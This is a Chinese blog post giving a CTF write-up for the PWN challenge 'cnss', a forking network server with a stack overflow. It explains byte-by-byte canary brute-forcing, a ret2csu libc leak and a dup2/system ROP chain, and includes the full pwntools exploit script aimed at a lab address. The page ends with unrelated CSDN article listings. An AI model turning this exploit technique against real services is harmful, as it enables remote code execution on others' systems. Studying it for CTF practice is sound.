攻防世界PWN之cnss题解

最新推荐文章于 2020-10-22 21:06:00 发布
最新推荐文章于 2020-10-22 21:06:00 发布
阅读量733 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104311465
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Cnss

首先,我们检查一下程序的保护机制

然后,我们用IDA分析一下,发现是一个服务器程序,每接收到连接请求后就会fork一个子进程来处理。

代码太长,看似很复杂

我们发现eval函数存在栈溢出,并且由于没有开启PIE,那么我们只需要泄露了canary的值就能轻松ROP了。

关键是canary泄露不了。然而,我们可以一字节一字节的爆破它。我们知道,canary的值是随机的,但是由于这是一个子进程,从父进程fork来的,因此它的数据和父进程里的一样。子进程崩溃不影响父进程,只要父进程没有重新运行,那么它的canary值就没变。每次fork的子进程里的canary值一样。因此,我们单字节单字节的爆破,当子进程崩溃,就认为不对,当子进程没有崩溃,说明当前这字节的canary数据,我们猜对了,继续爆破下一字节。

  1. #开始爆破canary  
  2. canary = '\x00'  
  3. for i in range(1,8):  
  4.    print '===crack last(',i+1,')byte===='  
  5.    for x in range(0,0x100):  
  6.       print 'trying ',hex(x)  
  7.       stack_overflow(0x18E + i + 1,'a'*0x18E + canary + p8(x))  
  8.       try:  
  9.          sh.recv()  
  10.          sh.recv()  
  11.       except:  
  12.          sh.close()  
  13.          init_connection()  
  14.          continue  
  15.       canary += p8(x)  
  16.       break  
  17. canary = u64(canary)  

当我们得到canary后,就是正常的栈溢出了。先是ret2csu,去执行write函数泄露libc地址,然后我们构造ROP,利用栈溢出写入即可。

综上,我们完整的exp脚本

#coding:utf8
from pwn import *
from LibcSearcher import *

elf = ELF('./cnss')
socket_got = elf.got['socket']
write_got = elf.got['write']
csu_pop = 0x40481A
csu_call = 0x404800
eval_ret = 0x401F15
pop_rdi = 0x404823
#pop rsi;pop rdi;ret
pop_rsi = 0x404821

def init_connection():
   global sh
   #sh = remote('127.0.0.1',1337)
   sh = remote('192.168.232.130',1337)
   sh.send(p32(0x4D435052))
   sh.send(p32(0) + p32(1,endian = 'big'))

def stack_overflow(size,content):
   sh.send(p32(0x4D435052))
   sh.send(p32(0) + p32(3,endian = 'big'))
   sh.send(p32(0)*2)
   sh.send(p32(0x10,endian = 'big'))
   sh.send('t'*0x10)
   sh.send(p32(size,endian = 'big'))
   sh.send(content)


init_connection()
#开始爆破canary
canary = '\x00'
for i in range(1,8):
   print '===crack last(',i+1,')byte===='
   for x in range(0,0x100):
      print 'trying ',hex(x)
      stack_overflow(0x18E + i + 1,'a'*0x18E + canary + p8(x))
      try:
         sh.recv()
         sh.recv()
      except:
         sh.close()
         init_connection()
         continue
      canary += p8(x)
      break
canary = u64(canary)
#canary = 0x679961d7ebc53500
#canary = 0x4202eb3d320ee000
print 'canary=',hex(canary)
#sh.recv()
#泄露socket函数地址
rop = p64(csu_pop)
rop += p64(0) + p64(1)
rop += p64(write_got)
rop += p64(0x8) + p64(socket_got) + p64(4)
rop += p64(csu_call)
payload = 'a'*0x18E + p64(canary) + p64(0) + rop
stack_overflow(len(payload),payload)
socket_addr = u64(sh.recv().ljust(8,'\x00'))
libc = LibcSearcher('socket',socket_addr)
libc_base = socket_addr - libc.dump('socket')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
dup2_addr = libc_base + libc.dump('dup2')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'dup2_addr=',hex(dup2_addr)
sh.close()
#getshell
init_connection()
#重定向0和1文件描述符到socket的fd
raw_input()
rop = p64(pop_rdi) + p64(4) + p64(pop_rsi) + p64(0)*2 + p64(dup2_addr)
rop += p64(pop_rdi) + p64(4) + p64(pop_rsi) + p64(1)*2 + p64(dup2_addr)
rop += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
payload = 'a'*0x18E + p64(canary) + p64(0) + rop
stack_overflow(len(payload),payload)

sh.interactive()
ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BROP入门之 KCTF 2022 废土末世
weixin_46483787的博客
05-25 1199
定义 来自CTF wiki: BROP 是没有对应应用程序的源代码或者二进制文件下,对程序进行攻击,劫持程序的执行流 攻击条件 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样(这也就是说即使程序有 ASLR 保护,但是其只是在程序最初启动的时候有效果)。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的 基本思路 暴力枚举获取栈溢出长度,逐字符比较泄露返回地址,获取gad
《信息安全原理》美Michael E.Whitman,Herbert J.Mattord著,王晓海译
Quest_sec的博客
06-17 1406
综述 本书全面介绍了信息安全的整个领域,其中包括许多相关元素的背景,以及理解该领域所需的足够细节。本书包含了该学科的术语、简史,并概述了信息安全计划的管理模式。 本书的结构遵循一种称为安全系统软件开发生命周期(或SecSDLC)的模式。 第一章、信息安全简介 发展史……安全的概念…..CNSS安全模型…. 信息系统(IS)比计算机硬件更丰富,它是使企业能够使用信息的人员、过程和技术的完整...
CNSS测量与数据处理作业
zzm200001的博客
03-20 726
1,研究卫星的轨道对于GPS定位有何意义? 答:因为GPS在进行导航和定位时,卫星是作为已知的观测目标存在,所以卫星轨道误差将直接影响用户接收机位置的精度。同时,在相对定位时,尽管卫星轨道误差的影响将会减弱,但当基线较长或精度要求较高时,轨道误差影响不可忽略。 2,卫星无摄运动,有摄运动是什么,其中描述无摄卫星轨道的开普勒轨道参数有哪些? 答:只考虑地球质心引力作用的卫星运动称为卫星的无摄运动;对...
CNSS课后作业
zzm200001的博客
04-12 349
1.解释测码、测相伪距观测方程,其观测值是什么?未知数是什么? 2,线性组合的形式与作用? 答:组合形式分別是单差、双差和三差。单差是站间一次差分,双差是站间、星间各求一次差,共两次差,三差是站间、星间和历元间各求一次差,共三次差。 作用:单差:消除了卫星钟差,有效地减弱了卫星轨道误差和大气延迟误差的影响, 但也减少了观测方程的数量。 双差:进一步消除接收机钟差的影响, 但双差观测方程数,也进一步...
Bugku Misc 流量分析(cnss)
我,我的博客
08-09 1143
附件下载,数据流文件,直接wireshark打开,很简单,6个包 于是,年轻的我开始了各种Cookie注入,想想认为一定放在bilibili个人空间的某个显眼的地方。 然后,各种失败。 最后,就想放弃这题之前去看看17190571这个ID 结果~ 经过两次base64解码,OK cnss{b1libil1_A_gay_wEbsite} 结束!!!...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
关于QQWry.dat格式
cnss的blog
08-18 1万+
关于QQwry格式作者  cnss 2004-8-18版权所有 转载请注明出处http://blog.csdn.net/cnss最近写了个比qqwry好的格式,点这里查看.刚才通过RSS看到一篇关于QQwry格式的blog: http://blog.csdn.net/taft/archive/2004/08/18/77559.aspx想不到QQwry还在用,这是俺两年前设计的,这个格式
Pastry学习笔记
cnss的blog
08-19 7960
Pastry学习笔记作者 cnss  2004-8-19版权所有 转载请注明出处http://blog.csdn.net/cnss★Pastry是一套peer-to-peer网络协议,Pastry有如下基本特性:1. 每个节点都有一个随机生成的128位nodeid.当收到一条含128位key的消息时,节点能高效地将消息发送到在当前节点中,数值上nodeid最接近key的节点.在Past
Pwn
bluestar628的博客
07-11 2467
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
CTF常见题型
阳光心态,健康人生的博客
12-19 1万+
CTF常见题型: CTF比赛通常包含的题目类型包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。CRYPTO(Cryptogra
send()、sendto()和recv()、recvfrom()的使用
热门推荐
echo_bright_的博客
05-11 2万+
udp通讯中的sendto()需要在参数里指定接收方的地址/端口,recvfrom()则在参数中存放接收发送方的地址/端口,与之对应的send()和recv()则不需要如此,但是在调用send()之前,需要为套接字指定接收方的地址/端口(这样该函数才知道要把数据发往哪里),在调用recv()之前,可以为套接字指定发送方的地址/端口,这样该函数就只接收指定的发送方的数据,当然若不指定也可,该函数就可以
DOSBOX中debug常用指令的使用
weixin_47586883的博客
10-22 1万+
仅作为个人学习笔记 挂在文件这些操作就不说了吧,一张图就够了 进入虚拟c盘,输入debug。 接下来先了解一下常用的一些debug中的命令。(命令不区分大小写) 一、查看、修改CPU中寄存器的内容:R命令。 1.直接输入r,查看寄存器中的内容: 2.改变寄存器中的内容: 可以观察到ax中的内容由0000改变成了ab23。 二、查看内存中的内容:D命令。 1.直接输入d,可以查看预设地址内存处的128个字节的内容: 输入r查看的内容中最下面一行就是当前所在的地址,即073f:0100,再输入d查看的就
unix 下send和recv函数详解 (转载)
neu_chao的专栏
03-19 2918
1.send 函数int send( SOCKET s, const char FAR *buf, int len, int flags );      不论是客户还是服务器应用程序都用send函数来向TCP连接的另一端发送数据。客户程序一般用send函数向服务器发送请求,而服务器则通常用send函数来向客户程序发送应答。    该函数的第一个参数指定发送端套接字描述符;   
攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1704
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值